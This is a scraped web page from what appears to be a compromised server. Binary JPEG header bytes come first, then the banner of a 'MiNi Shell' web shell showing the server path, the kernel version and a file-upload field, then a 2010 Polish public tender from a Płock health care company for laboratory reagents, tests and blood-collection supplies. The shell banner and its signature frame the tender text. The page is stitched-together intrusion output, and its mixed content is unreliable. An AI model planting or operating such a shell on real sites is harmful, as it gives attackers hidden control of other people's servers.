JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100222/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100222/36331-N-2010.html

<p class="kh_header"><b>Płock: ZAKUP I DOSTAWA ODCZYNNIKÓW, BARWNIKÓW, SZYBKICH TESTÓW I SYSTEMU PRÓŻNIOWEGO WRAZ Z DZIERŻAWĄ APARATU DO OZNACZANIA OB</b><br>
<b>Numer ogłoszenia: 36331 - 2010; data zamieszczenia: 22.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Płocki Zakład Opieki Zdrowotnej Sp. z o.o. , ul. Kościuszki 28, 09-402 Płock, woj. mazowieckie, tel. 024 3645100, 3645124, faks 024 3645102.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.plockizoz.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP I DOSTAWA ODCZYNNIKÓW, BARWNIKÓW, SZYBKICH TESTÓW I SYSTEMU PRÓŻNIOWEGO WRAZ Z DZIERŻAWĄ APARATU DO OZNACZANIA OB.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i sukcesywna dostawa odczynników barwników, szybkich testów i systemu próżniowego. Przedmiot zamówienia został podzielony na następujące pakiety:Pakiet Nr 1 - Próżniowy, zamknięty system pobierania krwi, Pakiet Nr 2 - Szybkie testy diagnostyczne, Pakiet Nr 3 - Odczynniki i akcesoria do wykonywania badań koagulologicznych przy użyciu aparatu Coag Chrom 3003, Pakiet Nr 4 - Barwniki i odczynniki, Pakiet Nr 5 - Sprzęt laboratoryjny jednorazowy, drobny, Pakiet Nr 6 - Metanol. W skład przedmiotu zamówienia wchodzą również:dzierżawa aparatu do oznaczania OB przeszkolenie personelu Zamawiającego związane z obsługą sprzętu jeden bezpłatny przegląd analizatora koagulologicznego CC - 3003 w ciągu roku.
Zamawiający nie przewiduje zawarcia umowy ramowej i nie ustanawia dynamicznego systemu zakupów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 33.19.25.00-7, 33.14.13.00-3, 38.43.45.20-7, 33.69.65.00-0, 38.43.70.00-7, 24.32.22.10-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek na podstawie oświadczenia, o którym mowa w Rozdziale IV pkt I ppkt. 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek na podstawie oświadczenia, o którym mowa w Rozdziale IV pkt I ppkt. 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek na podstawie oświadczenia, o którym mowa w Rozdziale IV pkt I ppkt. 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek na podstawie oświadczenia, o którym mowa w Rozdziale IV pkt I ppkt. 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek na podstawie oświadczenia, o którym mowa w Rozdziale IV pkt I ppkt. 1 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. stosowne dokumenty potwierdzające zgłoszenie oferowanych produktów do Rejestru Wyrobów Medycznych i Podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i do używania zgodnie z ustawą z dnia 20 kwietnia 2004 roku o wyrobach medycznych (Dz. U. Nr 93 z 2004 r. poz. 896), (dotyczy wszystkich pakietów);
2.certyfikat Systemu Zarządzania Jakością ISO 13485/2000, (dotyczy Pakietu Nr 2, 3);
3.certyfikat Systemu Zarządzania Jakością ISO 9001/2000, (dotyczy Pakietu Nr 1, 2, 3);
4.karty charakterystyki, (dotyczy Pakietu Nr 2, 4, 6); 
5.oświadczenie o pochodzeniu oferowanego asortymentu, należy podać nazwę i adres producenta, (dotyczy wszystkich pakietów
6. Formularz cenowy - Załącznik Nr 4/1 - 4/6 do SIWZ
7. Załącznik Nr 5 do SIWZ - informacja o serwisie Wykonawcy
8. Załącznik Nr 6/1 - 6/6 do SIWZ - zestawienie parametrów i warunków wymaganych (dotyczy Pakietu Nr 1, 3)
9. Załącznik Nr 7 do SIWZ - Kryteria oceny jakości (dotyczy Pakietu Nr 1)
10. pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów. Pełnomocnictwo musi zostać dołączone do oferty w formie oryginału lub poświadczonej notarialnie za zgodność z oryginałem kopii</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy, Zamawiający przewiduje możliwość następujących zmian postanowień umowy w stosunku do treści złożonej w postępowaniu oferty:
a.	zmiana przepisów prawa lub istotnych z uwagi na działalność dla Zamawiającego stosunków umownych,
b.	zmiana urzędowej stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian,
c.	zmiana stawek opłat celnych wprowadzonych decyzjami odpowiednich władz państwowych,
d.	jeżeli Wykonawca zostanie obarczony obowiązkiem zapłacenia podatku, który nie obowiązywał w dniu podpisania umowy, ale musi zostać wpisany do faktury z dnia dostawy, przy założeniu, że ceny jednostkowe netto pozostają bez zmian,
e.	zmiana producenta przedmiotu umowy, w przypadku gdy producent wskazany w ofercie przez Wykonawcę wycofał się z produkcji - przy cenie nie większej niż w umowie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.ipzp.pl/SZPZOZ-Plock<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Płocki Zakład Opieki Zdrowotnej Sp. z o.o., ul. Kościuszki 28, 09 - 402 Płock, pok. Nr 202..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2010 godzina 09:30, miejsce: Płocki Zakład Opieki Zdrowotnej Sp. z o.o., ul. Kościuszki 28, 09 - 402 Płock, pok. Nr 202. otwarcie ofert odbędzie się o godz.: 10:00 w siedzibie Zamawiającego, Wieża Ariańska Grzybek, I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobą uprawnioną do porozumiewania się z Wykonawcami jest Ewa Murawska - Inspektor, Biuro Zarządu, tel. 024 364 51 24, faks 024 364 51 02 w godzinach pracy Zamawiającego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet Nr 1 - Próżniowy, zamknięty system pobierania krwi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	Nazwa	
Oczekiwana
pojemność probówki
	
Dopuszczona pojemność probówki	
Szacunkowe ilości na 24 miesiące

1.	Probówki do morfologii  2ml z EDTA K3 ;średnica 13 mm, dług 75 mm	2 ml	(+/- )20%	59 000
2.	Probówki do morfologii 1 ml z EDTA K3 ;średnica 13 mm, dług 75 mm	1 ml	(+/- )20%	10 000
3.	Probówki do OB z cytrynianem sodowym, do 2 ml, odpowiednie do dzierżawionego aparatu 	do 2 ml	(+/- )20%	30 000
4.	Probówki do koagulologii 3,5 ml, z 3,2 % cytrynianem ; 
średnica 13 mm, dług 75 mm	3,5 ml	(+/- )25%	18 000
5.	Probówki do koagulologii 2 ml,   z 3,2 % cytrynianem ;
średnica 13 mm, dług 75 mm	2 ml	(+/- )20%	15 000
6.	Probówki z żelem separującym 4 ml ; średnica 13 mm, 
dł. 75-100 mm	4 ml	(+/- )20%	30 000
7.	Probówki z przyśpieszaczem wykrzepiania 6 ml ; średnica 13 mm, dł. 100 mm	6 ml	(+/- )20%	90 000
8.	Probówki z przyśpieszaczem wykrzepiania 9 ml ; średnica 16 mm, dł. 100 mm	9 ml	(+/- )20%	2 000
9.	Igły systemowe 0,8 mm/38mm			1 000
10.	Igły systemowe 0,9 mm/38mm			117 000
11.	Igły przezierne do trudnych pobrań			500
12.	Igły motylkowe 0.8 mm o długości igły do 20 mm i długości  wężyka 10-19 cm			500
13.	Łącznik do wenflonu  Luer -  adapter			1 000
14.	Uchwyt do igły systemowej jednorazowy 			119 000
15.	Uchwyt do igły typu  Luer 			2 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 33.19.25.00-7, 33.14.13.00-3, 38.43.45.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet Nr 2 - Szybkie testy diagnostyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
Nazwa testu 	
Wielkość opakowania	Szacunkowa ilość badań na 24 miesiące
1.	Krew utajona w kale  20 testów	500

2.	Amfetamina 10 testów	120

3.	Barbiturany	10 testów	120

4.	Benzodiazepiny 10 testów	120
5.	Ekstaza 10 testów	120
6.	Morfina 10 testów	120
7.	THC 	10 testów	120
8.	Kokaina 10 testów	70
9.	Mikroalbumina 10 testów 60
10.	Helicobacter pylori IgG 	36 testów	360
11.	HCV 	36 testów	700
12.	Test ciążowy 25 testów	50
13.	RPR test  	500 oznaczeń	5200
14.	Rotawirus/Adenowirus test 25 testów	300
15.	Waaler-Rose test 100 oznaczeń	500
16.	ASO latex test 	100 oznaczeń	700
17.	Mononukleoza latex test 50 oznaczeń	100
18.	Test Gardia Lamblia 25 testów	360
19.	Testy paskowe 2 parametrowe 100 pasków	4 op.
20.	Testy paskowe 3 parametrowe 100 pasków	4 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet Nr 3 - Odczynniki i akcesoria do wykonywania badań koagulologicznych
przy użyciu aparatu Coag Chrom 3003.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Parametr	Szacunkowe ilości badań/i materiału kontrolnego
w ciągu 24 miesięcy
1.	APTT	9 400 oznaczeń
2.	PT + fibrynogen	22 000 oznaczeń
3.	Kalibratory do w/w parametrów	50 ml (pakowane po 10 x 1 ml )
4.	Osocze kontrolne N	120 ml (pakowane po 10 x 1 ml )
5.	Osocze kontrolne L	60 ml (pakowane po 10 x 1 ml )
6.	Osocze kontrolne H	60 ml (pakowane po 10 x 1 ml )
7.	Osocze kontrolne dofibrynogenu /poziom normalny/	60 ml (pakowane po 10 x 1 ml )
8.	Osocze kontrolne do fibrynogenu /poziom wysoki /	60 ml (pakowane po 10 x 1 ml )
9.	Niezbędne do wykonywania oznaczeń rozcieńczalniki	100 ml (pakowane po 50 ml )
10.	Kuwety typu chrom do koagulometru Coag Chrom 3003	35 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet Nr 4 - Barwniki i odczynniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa odczynnika	Szacunkowe ilości na 24 miesiące
1.	Odczynnik May -Grunwalda    	26 litrów
2.	Odczynnik Giemzy	8 litrów
3.	Odczynnik do retikulocytów	200 ml
4.	Odczynnik Ekstona 	8 litrów
5.	Odczynnik Mac Wiliama 	2 litry
6.	Odczynnik Nonne - Appelta	300 ml
7.	Odczynnik Pandyego	300 ml
8.	 Odczynnik Sudan III	300 ml
9.	Odczynnik Rosina	300 ml
10.	Odczynnik Lugola	300 ml
11.	Czerwień fenolowa 	50 ml
12.	Kwas trójchlorooctowy 5 %	28  litrów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet Nr 5 - Sprzęt laboratoryjny jednorazowy, drobny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa	Szacunkowe ilości na 24 miesiące
1.	Probówki przejrzyste optycznie o pojemności  4 -5 ml (12x75) -okrągłodenne	100 000 szt.
2.	Probówki przejrzyste optycznie o pojemności 10-11 ml (16x100) -okrągłodenne	3 000 szt.
3.	Probówki do wirowania moczu o pojemności  12 ml, z podziałką na 10 ml i  z dołkiem o poj. 0,5 ml 	40 000 szt.
4.	Kamery z 10 komorami z siatką pomiarową do oglądania osadu moczu	4 000 szt.
5.	Korki wewnętrzne lub zewnętrzne  do probówek do wirowania moczu	4  000 szt.
6.	Probówki do wykrzepiania  z granulatem o pojemności 10 - 11 ml	3 000 szt.
7.	Probówki do wykrzepiania  z granulatem o pojemności 4 - 5 ml	1 000 szt.
8.	Probówki z  EDTA K3 na 1 ml krwi w systemie otwartym	500 szt.
9.	Probówki biochemiczne na 250 ?l krwi, z przyśpieszaczem wykrzepiania, z kapilarą do pobrania krwi  	200 szt.
10.	Probówki z  EDTA K3  lub EDTA K2 do badań hematologicznych na 100  ?l  krwi z kapilarą do pobrania krwi  	200 szt.
11.	Szkiełka podstawowe standardowe, z ciętymi krawędziami, gładkie o grubości 1 mm (76 mm x 26 mm)	 6 000 szt.
12.	Kapilary bez antykoagulantu ze znacznikiem pojemności 100?l	30 000 szt.
13.	Kapilary z heparyną sodową o pojemności 175 ?l	4 000 szt.
14.	Zatyczki do kapilar o pojemności powyżej 100 ?l	8 000 szt.
15.	Mieszadełka do kapilar o pojemności powyżej 100 ?l	3 000 szt.
16.	Końcówki do pipet o pojemności do 200 ?l/ żółte/	40 000 szt.
17.	Końcówki do pipet o pojemności do 1000 ?l / niebieskie/	20 000 szt.
18.	Pipetki Pasteura 1 ml o długości ok. 13 cm, bez podziałki,	6 000 szt.
19.	Nożyki stalowe, ręczne, do nakłuć, pakowane pojedynczo 	20 000 szt.
20.	Jednorazowe płyty do określania grup krwi 5x6 dołków, głębokości 4,5 - 5,5 mm, z przezroczystego PCV	 200 szt.
21.	Pisaki standardowe do opisywania probówek 	60 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 38.43.70.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet Nr 6 - Metanol.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa	Szacunkowa ilość
na 24 miesiące
1.	Metanol	14 litrów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 24.32.22.10-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com